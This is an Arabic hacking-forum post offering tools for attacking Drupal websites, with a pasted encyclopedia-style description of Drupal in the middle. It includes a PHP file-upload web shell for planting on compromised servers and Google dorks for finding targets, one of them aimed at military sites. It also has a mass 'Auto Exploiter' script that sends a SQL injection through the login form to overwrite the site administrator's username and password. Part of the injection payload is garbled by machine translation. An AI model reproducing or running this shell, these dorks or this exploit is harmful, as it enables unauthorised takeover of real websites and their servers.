مشاهدات الان
نبدأ اولا بالنبذه عنه وموقعهم
عليك برفع الكود بي قالب اج بي اج
php
============== معرب
<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="اضغط لرفع"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>تفعيل التحميل !!!</b><br><br>'; }
else { echo '<b>Upload HkRkoz !!!</b><br><br>'; }
}
?>
============== الغير معرب
<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload work !!!</b><br><br>'; }
else { echo '<b>Upload !!!</b><br><br>'; }
}
?>
اكواد القالب <<<
"Powered By Drupal"
دروبال نظام لإدارة المحتوى بمواقع شبكة الإنترنت، ويمكن أن يعمل أيضاً كنظام للتدوين أو كنظام لبناء تطبيقات الويب. بدأ تصميمه دريس بايتيرت ليكون برنامج لإنشاء المنتديات، ولكن دروبال تطور إلى أبعد من هذا نظراً لتصميمه الجيد وبنيته المرنة التي يمكن التحكم بها وتطويرها بسهولة. يستخدم دروبال في مواقع شهيرة مثل Debian Planet و Spread Firefox.البرنامج مشهور في استخدامه في بناء المجتمعات القائمة على الويب.دروبال مكتوب بلغة برمجة بي اتش بي
معنى كلمة دروبال
تكتب بالعربية (دروبال)، وهي تعريب لفظي للاسم الإنجليزي Drupal، الذي أتى بدوره من الهولندية Druppel، والتي تعني بالعربية قطرة كما في "قطرة ماء"
نظام إدارة المحتوى
يحتوي دروبال على بذرة أساسية، أو ما يمكن أن يسمى بقلب النظام. يدعم قلب النظام إضافة دوال برمجية تكتب خصيصا لتتوافق مع النظام. توفر هذه الدوال إمكانيات إضافية عديدة منها: إمكانية إضافة أنظمة للتجارة الإلكترونية، وألبومات الصور، وأنظمة إدارة القوائم البريدية، والدمج مع CVS
إن تصميم نظام الدوال البرمجية في دروبال، بالإضافة إلى قاعدة الشيفرات الموثقة جيداً يجعلان من الأسهل بمكان على الأشخاص ذوي المعرفة بلغة بي إتش بي أن يكتبوا شيفرات تضيف مزايا جديدة للبرنامج. يستخدم البرنامج بكثرة في بناء المواقع التي تركز على مجموعات المستخدمين
نظام الصناديق في دروبال
يتيح نظام الصناديق Blocks إضافة أي محتوى في أي مكان داخل الصفحة بشرط أن يتوافق مع القالب المستخدم، فإذا كان القالب يقسم الصفحة إلى ثلاثة اعمدة، يمكن حينها إضافة اي محتوى نصيا كان أم غير نصي إلى أحد الاعمدة الثلاثة، ويمكن كذلك ترتيب المحتوى في العمود الواحد، فيتم تحديد من الأول ثم التالي بمرونه وسهولة عالية
دعم اللغة العربية
بداية من دروبال 6، أصبح دعم اللغة العربية (واللغات التي تكتب من اليمين لليسار عموما) مدمجا في دروبال، حيث يمكن للنظام عرض المواقع من اليمين لليسار ببساطة ودون أي تعديلات في السمات المستخدمة كما توجد وحدات إضافية لدعم خلط النصوص العربية مع غير العربية
تعريب دروبال
يعمل فريق من المتطوعين على تعريب دروبال منذ الإصدارة 4.7 حيث يتوفر بواجهة عربية كاملة. في 20 فبراير 2010 صدر تعريب دروبال 6 آخر إصدارة مستقرة من دروبال
^ صدور دروبال 6 - عربي
^ وحدة Jquery Bidi
^ مشروع تعريب دروبال
^ تعريب دروبال 6
وصلات خارجية
الموقع الرسمي لدروبال
صفحة الفريق العربي لترجمة دروبال
دليل بالمواقع التي تستخدم دروبال
معاينة سمات دروبال
وثائق موجهة للمطورين
دروس دروبال
المطورون دريس بايتيرث
الإصدار المستقر 8.1.0
لغة البرمجة بي.إتش.بي
نظام التشغيل متعدد المنصات تعديل قيمة خاصية نظام التشغيل (P306) في ويكي بيانات
نوع نظام إدارة المحتوى
الرخصة رخصة جنو العمومية
موقع الويب
المثال لبرمجه السكربت بموقع عربي
* الان شرح التركيب بالصوره
والان راح ارفع لكم احد الثغرات بشرح مفصل وتعريب هكركوز الكويت
- تحتاج قوالب بي اج بي فاضيه او انزل اللى مسويه وسمه ما تسميه كما سميت
Drupal-7HkRkoz9
وهذا اخر مرفوع غير معرب -
وهو خاص في البحث عن الثغره المصابه في اي موقع ولزم ترفعها باي استضافه ومني لك المثال تفضل
وتحتاج لبرمجه رفع الملفات : مركز تحميل : وعندي لكم هذا تفضل
* الان طريقه البحث عن المواقع المركبه هذي البرمجه لسكربت
Google Dork : قوقل او غيره حسب اختيارك
Index of /Drupal/Core
للمحترفين
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /drupal/drupal/includes/
Disallow: /drupal/misc/
Disallow: /drupal/modules/
Disallow: /drupal/profiles/
Disallow: /drupal/scripts/
Disallow: /drupal/sites/
Disallow: /drupal/themes/
# Files
Disallow: /drupal/CHANGELOG.txt
Disallow: /drupal/cron.php
Disallow: /drupal/INSTALL.mysql.txt
Disallow: /drupal/INSTALL.pgsql.txt
Disallow: /drupal/install.php
Disallow: /drupal/INSTALL.txt
Disallow: /drupal/LICENSE.txt
Disallow: /drupal/MAINTAINERS.txt
Disallow: /drupal/update.php
Disallow: /drupal/UPGRADE.txt
Disallow: /drupal/xmlrpc.php
# Paths (clean URLs)
Disallow: /drupal/admin/
Disallow: /drupal/comment/reply/
Disallow: /drupal/contact/
Disallow: /drupal/logout/
Disallow: /drupal/node/add/
Disallow: /drupal/search/
Disallow: /drupal/user/register/
Disallow: /drupal/user/password/
Disallow: /drupal/user/login/
# Paths (no clean URLs)
Disallow: /drupal/?q=admin/
Disallow: /drupal/?q=comment/reply/
Disallow: /drupal/?q=contact/
Disallow: /drupal/?q=logout/
Disallow: /drupal/?q=node/add/
Disallow: /drupal/?q=search/
Disallow: /drupal/?q=user/password/
Disallow: /drupal/?q=user/register/
Disallow: /drupal/?q=user/login/
ويمكنك تشكل تشكيله في التغير
inurl:"drupal"
php
============== معرب
<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="اضغط لرفع"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>تفعيل التحميل !!!</b><br><br>'; }
else { echo '<b>Upload HkRkoz !!!</b><br><br>'; }
}
?>
============== الغير معرب
<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload work !!!</b><br><br>'; }
else { echo '<b>Upload !!!</b><br><br>'; }
}
?>
اكواد القالب <<<
<html>
<head>
<meta http-equiv="Content-Language" content="ar-kw">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
<title>Drupal 7.x Auto Exploiter alGme3</title>
</head>
<body bgcolor="#0F0F0F">
<div align="center">
<table border="0" width="4%" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<img border="0" src="http://www.feinwerk.de/wp/blogs/kw/kuwaiT-algme3_01.png" width="1000" height="289"></td>
</tr>
<tr>
<td align="center" background="http://www.feinwerk.de/wp/blogs/kw/kuwaiT-algme3_02.png" height="291">
<p> <html><title>Drupal 7.x Auto Exploiter</title>
<body bgcolor="#000000">
<font color='red'><pre><p><center>
تعريب وتطوير هكركوز الكويت
لثغره Drupal Auto Exploiter
______________________________________________________________
<pre>قائمه المواقع :</font><hre>
<form method='POST'>
<textarea name='sites' cols='45' rows='15'></textarea>
<input type='submit' value='إضغط لبحث عن الثغره Exploit' /><br>
</form>
<?php
/*
Coded by kuwaiT
inurl:sites/default/files/ site:mil.**
*/
error_reporting(0);
$log = "/user/login";
$url=explode("\r\n", $_POST['sites']);
foreach ($url as $site) {
$sofyan = "/?q=user";
$post_data = "name[0;اسم المستخدمين تحديث مجموعة %3D 'kuwaiT' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' حيث رمز المستخدم %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($site . '/user/login/', null, $ctx);
echo "<font color=blue>Testing user/login $site <br>";
if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) {
echo "<font color=green>الاسم :kuwaiT <br>الباسبورت :admin<br>";
} else {
echo "<font color=red>لا يوجد بيانات. <br>";
}
}
$url=explode("\r\n", $_POST['sites']);
foreach ($url as $site) {
$post_data = "name[0;اسم المستخدمين تحديث مجموعة %3D 'kuwaiT' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' حيث رمز المستخدم %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
$params = array(
'http' => array(
'method' => 'POST',
'header' => "نوع المحتوي: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($site . '?q=node&destination=node', null, $ctx);
echo "<font color=blue>Testing at Index $site <br>";
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "<font color=green>الاسم :kuwaiT <br> الباسبورت :admin <br>";
} else {
echo "<font color=red>لا يوجد بيانات. \n ";
}
}
?>
</pre></p></center></p>
<p> </p>
</td>
</tr>
<tr>
<td align="center">
<img border="0" src="http://www.feinwerk.de/wp/blogs/kw/kuwaiT-algme3_03.png" width="1000" height="271"></td></tr></table></div></body></html>
وسلامتكم